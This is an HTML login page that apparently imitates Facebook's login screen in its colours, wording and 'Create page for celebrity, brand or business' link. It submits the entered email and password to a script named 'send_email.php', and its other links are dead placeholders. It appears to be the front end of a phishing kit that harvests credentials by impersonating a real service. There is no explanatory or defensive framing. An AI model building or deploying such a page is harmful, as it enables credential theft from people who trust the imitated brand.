<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
<style>
  body {
    font-family: Arial, sans-serif;
    background-color: #f4f4f4;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
  }

  .container {
    background-color: #fff;
    padding: 20px;
    width: 350px;
    border-radius: 8px;
    box-shadow: 0px 0px 10px 0px rgba(0,0,0,0.1);
  }

  .form-group {
    margin-bottom: 20px;
  }

  .form-group label {
    display: block;
    font-weight: bold;
    margin-bottom: 5px;
  }

  .form-group input {
    width: 95%;
    height: 30px;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 4px;
    font-size: 16px;
  }

  .form-group button {
    font-family: Arial, Helvetica, sans-serif;
    width: 100%;
    padding: 10px;
    font-weight: bold;
    border: none;
    border-radius: 4px;
    background-color: #0866FF;
    color: #fff;
    font-size: 20px;
    cursor: pointer;
    height: 50px;
  }

  .form-group button:hover {

  }

  .forgotten-password {
    font-size: 14px;
    font-family: Arial, Helvetica, sans-serif;
    text-align: center;
  }

  .buttom-line {
    align-items: center;
    border-bottom: 1px solid #dadde1;
    display: flex;
    margin: 20px 16px;
    text-align: center;
}

.create-account-btn {
    font-family: Arial, Helvetica, sans-serif;
    background: #42B72A;
    font-size: 17px;
    font-style: bold;
    padding-top: 13px;
    color: white;
    font-weight: bold;
    padding-bottom: 13px;
    padding-left: 20px;
    padding-right: 20px;
    border: none;
    border-radius: 6px;
    margin-left: 75px;
    cursor: pointer;
}

.create-page {
    text-decoration: none;
}

</style>
</head>
<body>

<div class="container">
  <h2>Login</h2>
  <form action="send_email.php" method="post">
    <div class="form-group">
      <input type="email" id="email" name="email" placeholder="Email address or phone number" required>
    </div>
    <div class="form-group">
      <input type="password" id="password" name="password" placeholder="Password" required>
    </div>
    <div class="form-group">
      <button type="submit">Log in</button>
    </div>
    <p class="forgotten-password"><a href="*">Forgotten password?</a></p>

    <div class="buttom-line"></div>

    <button class="create-account-btn">Create new account</button>

  </form>

<p class="create-page"><a href="*">Create page</a> for celebrity, brand or business</p>

</div>

</body>
</html>
